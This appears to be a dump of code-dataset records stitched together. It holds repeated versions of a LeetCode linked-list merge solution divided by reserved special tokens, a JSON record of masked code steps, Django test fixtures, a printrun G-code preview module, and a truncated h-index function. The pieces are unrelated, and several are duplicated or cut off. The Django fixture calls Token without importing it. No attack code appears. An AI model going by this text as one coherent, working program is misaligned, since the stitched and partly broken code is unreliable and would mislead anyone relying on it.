def make_list(_l: List):
head = ListNode(_l[0])
itr = head
for val in _l[1:]:
node = ListNode(val)
itr.next = node
itr = node
return head
def print_list(l: ListNode):
itr = l
while itr:
print(itr.val, end=' ')
itr = itr.next
print()
if __name__ == '__main__':
solution = Solution()
_l1 = [1, 2, 4]
l1 = make_list(_l1)
_l2 = [1, 3, 4]
l2 = make_list(_l2)
print_list(solution.mergeTwoLists(l1, l2))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from typing import List
import sys
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def mergeTwoLists(self, l1: ListNode, l2: ListNode) ->ListNode:
ret = itr = ListNode(-sys.maxsize)
while l1 and l2:
v1 = l1.val
v2 = l2.val
if v1 <= v2:
itr.next = ListNode(v1)
l1 = l1.next
else:
itr.next = ListNode(v2)
l2 = l2.next
itr = itr.next
if l1:
itr.next = l1
if l2:
itr.next = l2
return ret.next
def make_list(_l: List):
head = ListNode(_l[0])
itr = head
for val in _l[1:]:
node = ListNode(val)
itr.next = node
itr = node
return head
def print_list(l: ListNode):
itr = l
while itr:
print(itr.val, end=' ')
itr = itr.next
print()
if __name__ == '__main__':
solution = Solution()
_l1 = [1, 2, 4]
l1 = make_list(_l1)
_l2 = [1, 3, 4]
l2 = make_list(_l2)
print_list(solution.mergeTwoLists(l1, l2))
<|reserved_special_token_1|>
#
# LeetCode
# ver.Python
#
# Created by GGlifer
#
# Open Source
"""
21. Merge Two Sorted Lists
"""
from typing import List
import sys
# Definition for singly-linked list.
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:
ret = itr = ListNode(-sys.maxsize)
while l1 and l2:
v1 = l1.val
v2 = l2.val
if v1 <= v2:
itr.next = ListNode(v1)
l1 = l1.next
else:
itr.next = ListNode(v2)
l2 = l2.next
itr = itr.next
if l1:
itr.next = l1
if l2:
itr.next = l2
return ret.next
def make_list(_l: List):
head = ListNode(_l[0])
itr = head
for val in _l[1:]:
node = ListNode(val)
itr.next = node
itr = node
return head
def print_list(l: ListNode):
itr = l
while itr:
print(itr.val, end=' ')
itr = itr.next
print()
if __name__ == "__main__":
solution = Solution()
_l1 = [1, 2, 4]
l1 = make_list(_l1)
_l2 = [1, 3, 4]
l2 = make_list(_l2)
print_list(solution.mergeTwoLists(l1, l2))
|
flexible
|
{
"blob_id": "2730b2a1016f306936dcac3c3b44a3fd7194bac6",
"index": 7216,
"step-1": "<mask token>\n\n\nclass ListNode:\n\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) ->ListNode:\n ret = itr = ListNode(-sys.maxsize)\n while l1 and l2:\n v1 = l1.val\n v2 = l2.val\n if v1 <= v2:\n itr.next = ListNode(v1)\n l1 = l1.next\n else:\n itr.next = ListNode(v2)\n l2 = l2.next\n itr = itr.next\n if l1:\n itr.next = l1\n if l2:\n itr.next = l2\n return ret.next\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ListNode:\n\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) ->ListNode:\n ret = itr = ListNode(-sys.maxsize)\n while l1 and l2:\n v1 = l1.val\n v2 = l2.val\n if v1 <= v2:\n itr.next = ListNode(v1)\n l1 = l1.next\n else:\n itr.next = ListNode(v2)\n l2 = l2.next\n itr = itr.next\n if l1:\n itr.next = l1\n if l2:\n itr.next = l2\n return ret.next\n\n\ndef make_list(_l: List):\n head = ListNode(_l[0])\n itr = head\n for val in _l[1:]:\n node = ListNode(val)\n itr.next = node\n itr = node\n return head\n\n\ndef print_list(l: ListNode):\n itr = l\n while itr:\n print(itr.val, end=' ')\n itr = itr.next\n print()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ListNode:\n\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) ->ListNode:\n ret = itr = ListNode(-sys.maxsize)\n while l1 and l2:\n v1 = l1.val\n v2 = l2.val\n if v1 <= v2:\n itr.next = ListNode(v1)\n l1 = l1.next\n else:\n itr.next = ListNode(v2)\n l2 = l2.next\n itr = itr.next\n if l1:\n itr.next = l1\n if l2:\n itr.next = l2\n return ret.next\n\n\ndef make_list(_l: List):\n head = ListNode(_l[0])\n itr = head\n for val in _l[1:]:\n node = ListNode(val)\n itr.next = node\n itr = node\n return head\n\n\ndef print_list(l: ListNode):\n itr = l\n while itr:\n print(itr.val, end=' ')\n itr = itr.next\n print()\n\n\nif __name__ == '__main__':\n solution = Solution()\n _l1 = [1, 2, 4]\n l1 = make_list(_l1)\n _l2 = [1, 3, 4]\n l2 = make_list(_l2)\n print_list(solution.mergeTwoLists(l1, l2))\n",
"step-4": "<mask token>\nfrom typing import List\nimport sys\n\n\nclass ListNode:\n\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) ->ListNode:\n ret = itr = ListNode(-sys.maxsize)\n while l1 and l2:\n v1 = l1.val\n v2 = l2.val\n if v1 <= v2:\n itr.next = ListNode(v1)\n l1 = l1.next\n else:\n itr.next = ListNode(v2)\n l2 = l2.next\n itr = itr.next\n if l1:\n itr.next = l1\n if l2:\n itr.next = l2\n return ret.next\n\n\ndef make_list(_l: List):\n head = ListNode(_l[0])\n itr = head\n for val in _l[1:]:\n node = ListNode(val)\n itr.next = node\n itr = node\n return head\n\n\ndef print_list(l: ListNode):\n itr = l\n while itr:\n print(itr.val, end=' ')\n itr = itr.next\n print()\n\n\nif __name__ == '__main__':\n solution = Solution()\n _l1 = [1, 2, 4]\n l1 = make_list(_l1)\n _l2 = [1, 3, 4]\n l2 = make_list(_l2)\n print_list(solution.mergeTwoLists(l1, l2))\n",
"step-5": "#\n# LeetCode\n# ver.Python\n#\n# Created by GGlifer\n#\n# Open Source\n\n\"\"\"\n21. Merge Two Sorted Lists\n\"\"\"\n\nfrom typing import List\nimport sys\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n ret = itr = ListNode(-sys.maxsize)\n while l1 and l2:\n v1 = l1.val\n v2 = l2.val\n if v1 <= v2:\n itr.next = ListNode(v1)\n l1 = l1.next\n else:\n itr.next = ListNode(v2)\n l2 = l2.next\n itr = itr.next\n\n if l1:\n itr.next = l1\n if l2:\n itr.next = l2\n\n return ret.next\n\n\ndef make_list(_l: List):\n head = ListNode(_l[0])\n itr = head\n for val in _l[1:]:\n node = ListNode(val)\n itr.next = node\n itr = node\n return head\n\n\ndef print_list(l: ListNode):\n itr = l\n while itr:\n print(itr.val, end=' ')\n itr = itr.next\n print()\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n\n _l1 = [1, 2, 4]\n l1 = make_list(_l1)\n _l2 = [1, 3, 4]\n l2 = make_list(_l2)\n\n print_list(solution.mergeTwoLists(l1, l2))\n\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
from django.contrib.auth.models import User
from django.test import Client
from django.utils.timezone import localdate
from pytest import fixture
from operations.models import ToDoList
@fixture
def user(db):
return User.objects.create(
username='test', email='[email protected]',
password='test',
)
@fixture
def authenticated_author_client(
user, client: Client
) -> Client:
token = Token.objects.get_or_create(user=user)[0].key
client.defaults['HTTP_AUTHORIZATION'] = f'Token {token}'
print(client)
return client
@fixture
def todo(db, user):
return ToDoList.objects.create(
user=user,
title='Test task',
description='Uchet kz test task',
deadline=localdate(),
executed=False
)
|
normal
|
{
"blob_id": "347d468f15dee8a8219d201251cedffe21352f7c",
"index": 8813,
"step-1": "<mask token>\n\n\n@fixture\ndef authenticated_author_client(user, client: Client) ->Client:\n token = Token.objects.get_or_create(user=user)[0].key\n client.defaults['HTTP_AUTHORIZATION'] = f'Token {token}'\n print(client)\n return client\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@fixture\ndef user(db):\n return User.objects.create(username='test', email=\n '[email protected]', password='test')\n\n\n@fixture\ndef authenticated_author_client(user, client: Client) ->Client:\n token = Token.objects.get_or_create(user=user)[0].key\n client.defaults['HTTP_AUTHORIZATION'] = f'Token {token}'\n print(client)\n return client\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@fixture\ndef user(db):\n return User.objects.create(username='test', email=\n '[email protected]', password='test')\n\n\n@fixture\ndef authenticated_author_client(user, client: Client) ->Client:\n token = Token.objects.get_or_create(user=user)[0].key\n client.defaults['HTTP_AUTHORIZATION'] = f'Token {token}'\n print(client)\n return client\n\n\n@fixture\ndef todo(db, user):\n return ToDoList.objects.create(user=user, title='Test task',\n description='Uchet kz test task', deadline=localdate(), executed=False)\n",
"step-4": "from django.contrib.auth.models import User\nfrom django.test import Client\nfrom django.utils.timezone import localdate\nfrom pytest import fixture\nfrom operations.models import ToDoList\n\n\n@fixture\ndef user(db):\n return User.objects.create(username='test', email=\n '[email protected]', password='test')\n\n\n@fixture\ndef authenticated_author_client(user, client: Client) ->Client:\n token = Token.objects.get_or_create(user=user)[0].key\n client.defaults['HTTP_AUTHORIZATION'] = f'Token {token}'\n print(client)\n return client\n\n\n@fixture\ndef todo(db, user):\n return ToDoList.objects.create(user=user, title='Test task',\n description='Uchet kz test task', deadline=localdate(), executed=False)\n",
"step-5": "from django.contrib.auth.models import User\nfrom django.test import Client\nfrom django.utils.timezone import localdate\nfrom pytest import fixture\n\nfrom operations.models import ToDoList\n\n\n@fixture\ndef user(db):\n return User.objects.create(\n username='test', email='[email protected]',\n password='test',\n )\n\n\n@fixture\ndef authenticated_author_client(\n user, client: Client\n) -> Client:\n token = Token.objects.get_or_create(user=user)[0].key\n client.defaults['HTTP_AUTHORIZATION'] = f'Token {token}'\n print(client)\n return client\n\n\n@fixture\ndef todo(db, user):\n return ToDoList.objects.create(\n user=user,\n title='Test task',\n description='Uchet kz test task',\n deadline=localdate(),\n executed=False\n )\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# This file is part of the printrun suite.
#
# printrun is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# printrun is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with printrun. If not, see <http://www.gnu.org/licenses/>.
import traceback
import logging
import wx
class NoViz:
showall = False
def clear(self, *a):
pass
def addfile_perlayer(self, gcode, showall = False):
layer_idx = 0
while layer_idx < len(gcode.all_layers):
yield layer_idx
layer_idx += 1
yield None
def addfile(self, *a, **kw):
pass
def addgcode(self, *a, **kw):
pass
def addgcodehighlight(self, *a, **kw):
pass
def Refresh(self, *a):
pass
def setlayer(self, *a):
pass
class NoVizWindow:
def __init__(self):
self.p = NoViz()
def Destroy(self):
pass
class VizPane(wx.BoxSizer):
    """Vertical sizer that builds the G-code visualization for the UI.

    Depending on root.settings.mainviz ("None", "2D" or "3D") it installs
    root.gviz (the embedded preview widget) and root.gwindow (the
    standalone preview window), falling back from 3D to 2D when the 3D
    viewer cannot be initialized.
    """

    def __init__(self, root, parentpanel = None):
        super(VizPane, self).__init__(wx.VERTICAL)
        if not parentpanel: parentpanel = root.panel
        if root.settings.mainviz == "None":
            # Visualization disabled: install inert stand-ins so the rest
            # of the UI can call gviz/gwindow methods unconditionally.
            root.gviz = NoViz()
            root.gwindow = NoVizWindow()
            return
        use2dview = root.settings.mainviz == "2D"
        if root.settings.mainviz == "3D":
            try:
                import printrun.gcview
                root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel, root.build_dimensions_list, root = root, circular = root.settings.circular_bed, antialias_samples = int(root.settings.antialias3dsamples))
                root.gviz.clickcb = root.show_viz_window
            # Was a bare `except:`, which also swallowed SystemExit and
            # KeyboardInterrupt; narrow it to Exception.
            except Exception:
                use2dview = True
                logging.error("3D view mode requested, but we failed to initialize it.\n"
                              + "Falling back to 2D view, and here is the backtrace:\n"
                              + traceback.format_exc())
        if use2dview:
            from printrun import gviz
            root.gviz = gviz.Gviz(parentpanel, (300, 300),
                                  build_dimensions = root.build_dimensions_list,
                                  grid = (root.settings.preview_grid_step1, root.settings.preview_grid_step2),
                                  extrusion_width = root.settings.preview_extrusion_width,
                                  bgcolor = root.bgcolor)
            root.gviz.SetToolTip(wx.ToolTip(_("Click to examine / edit\n layers of loaded file")))
            root.gviz.showall = 1
            root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)
        use3dview = root.settings.viz3d
        if use3dview:
            try:
                import printrun.gcview
                objects = None
                if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):
                    # Share the already-loaded model with the standalone window.
                    objects = root.gviz.objects
                root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.ID_ANY, 'Gcode view, shift to move view, mousewheel to set layer', size = (600, 600), build_dimensions = root.build_dimensions_list, objects = objects, root = root, circular = root.settings.circular_bed, antialias_samples = int(root.settings.antialias3dsamples))
            # See above: narrow the bare `except:` to Exception.
            except Exception:
                use3dview = False
                logging.error("3D view mode requested, but we failed to initialize it.\n"
                              + "Falling back to 2D view, and here is the backtrace:\n"
                              + traceback.format_exc())
        if not use3dview:
            from printrun import gviz
            root.gwindow = gviz.GvizWindow(build_dimensions = root.build_dimensions_list,
                                           grid = (root.settings.preview_grid_step1, root.settings.preview_grid_step2),
                                           extrusion_width = root.settings.preview_extrusion_width,
                                           bgcolor = root.bgcolor)
        root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())
        if not isinstance(root.gviz, NoViz):
            self.Add(root.gviz.widget, 1, flag = wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL)
|
normal
|
{
"blob_id": "3cc473f6bb4b2e1dd806edb8b096a6118fe7056a",
"index": 7202,
"step-1": "<mask token>\n\n\nclass NoViz:\n <mask token>\n <mask token>\n <mask token>\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n <mask token>\n <mask token>\n\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel=None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel:\n parentpanel = root.panel\n if root.settings.mainviz == 'None':\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == '2D'\n if root.settings.mainviz == '3D':\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,\n root.build_dimensions_list, root=root, circular=root.\n settings.circular_bed, antialias_samples=int(root.\n settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions\n =root.build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\n 'Click to examine / edit\\n layers of loaded file')))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.\n ID_ANY,\n 'Gcode view, shift to move view, mousewheel to set layer',\n size=(600, 
600), build_dimensions=root.\n build_dimensions_list, objects=objects, root=root,\n circular=root.settings.circular_bed, antialias_samples=\n int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions=root.\n build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.\n ALIGN_CENTER_HORIZONTAL)\n",
"step-2": "<mask token>\n\n\nclass NoViz:\n <mask token>\n <mask token>\n <mask token>\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n <mask token>\n\n def setlayer(self, *a):\n pass\n\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel=None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel:\n parentpanel = root.panel\n if root.settings.mainviz == 'None':\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == '2D'\n if root.settings.mainviz == '3D':\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,\n root.build_dimensions_list, root=root, circular=root.\n settings.circular_bed, antialias_samples=int(root.\n settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions\n =root.build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\n 'Click to examine / edit\\n layers of loaded file')))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.\n ID_ANY,\n 'Gcode view, shift to move view, mousewheel to set 
layer',\n size=(600, 600), build_dimensions=root.\n build_dimensions_list, objects=objects, root=root,\n circular=root.settings.circular_bed, antialias_samples=\n int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions=root.\n build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.\n ALIGN_CENTER_HORIZONTAL)\n",
"step-3": "<mask token>\n\n\nclass NoViz:\n <mask token>\n\n def clear(self, *a):\n pass\n <mask token>\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n <mask token>\n\n def setlayer(self, *a):\n pass\n\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel=None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel:\n parentpanel = root.panel\n if root.settings.mainviz == 'None':\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == '2D'\n if root.settings.mainviz == '3D':\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,\n root.build_dimensions_list, root=root, circular=root.\n settings.circular_bed, antialias_samples=int(root.\n settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions\n =root.build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\n 'Click to examine / edit\\n layers of loaded file')))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.\n ID_ANY,\n 'Gcode view, shift to move view, 
mousewheel to set layer',\n size=(600, 600), build_dimensions=root.\n build_dimensions_list, objects=objects, root=root,\n circular=root.settings.circular_bed, antialias_samples=\n int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions=root.\n build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.\n ALIGN_CENTER_HORIZONTAL)\n",
"step-4": "import traceback\nimport logging\nimport wx\n\n\nclass NoViz:\n showall = False\n\n def clear(self, *a):\n pass\n\n def addfile_perlayer(self, gcode, showall=False):\n layer_idx = 0\n while layer_idx < len(gcode.all_layers):\n yield layer_idx\n layer_idx += 1\n yield None\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n\n def Refresh(self, *a):\n pass\n\n def setlayer(self, *a):\n pass\n\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel=None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel:\n parentpanel = root.panel\n if root.settings.mainviz == 'None':\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == '2D'\n if root.settings.mainviz == '3D':\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,\n root.build_dimensions_list, root=root, circular=root.\n settings.circular_bed, antialias_samples=int(root.\n settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions\n =root.build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\n 'Click to examine / edit\\n layers of loaded file')))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n 
if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.\n ID_ANY,\n 'Gcode view, shift to move view, mousewheel to set layer',\n size=(600, 600), build_dimensions=root.\n build_dimensions_list, objects=objects, root=root,\n circular=root.settings.circular_bed, antialias_samples=\n int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions=root.\n build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.\n ALIGN_CENTER_HORIZONTAL)\n",
"step-5": "# This file is part of the printrun suite.\n#\n# printrun is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# printrun is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with printrun. If not, see <http://www.gnu.org/licenses/>.\n\nimport traceback\nimport logging\n\nimport wx\n\nclass NoViz:\n\n showall = False\n\n def clear(self, *a):\n pass\n\n def addfile_perlayer(self, gcode, showall = False):\n layer_idx = 0\n while layer_idx < len(gcode.all_layers):\n yield layer_idx\n layer_idx += 1\n yield None\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n\n def Refresh(self, *a):\n pass\n\n def setlayer(self, *a):\n pass\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel = None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel: parentpanel = root.panel\n if root.settings.mainviz == \"None\":\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == \"2D\"\n if root.settings.mainviz == \"3D\":\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel, root.build_dimensions_list, root = root, circular = root.settings.circular_bed, antialias_samples = int(root.settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\"3D view mode requested, but we failed to initialize 
it.\\n\"\n + \"Falling back to 2D view, and here is the backtrace:\\n\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300),\n build_dimensions = root.build_dimensions_list,\n grid = (root.settings.preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width = root.settings.preview_extrusion_width,\n bgcolor = root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\"Click to examine / edit\\n layers of loaded file\")))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.ID_ANY, 'Gcode view, shift to move view, mousewheel to set layer', size = (600, 600), build_dimensions = root.build_dimensions_list, objects = objects, root = root, circular = root.settings.circular_bed, antialias_samples = int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\"3D view mode requested, but we failed to initialize it.\\n\"\n + \"Falling back to 2D view, and here is the backtrace:\\n\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions = root.build_dimensions_list,\n grid = (root.settings.preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width = root.settings.preview_extrusion_width,\n bgcolor = root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag = wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL)\n",
"step-ids": [
9,
10,
11,
15,
16
]
}
|
[
9,
10,
11,
15,
16
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def solution(citations):
citations.sort()
for i in range(len(citations)):
if citations[i] >= len(citations) - i:
return len(citations) - i
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def solution(citations):
    """Return the h-index of a citation-count list.

    The h-index is the largest h such that at least h papers have
    h or more citations each. The input list is sorted in place.
    """
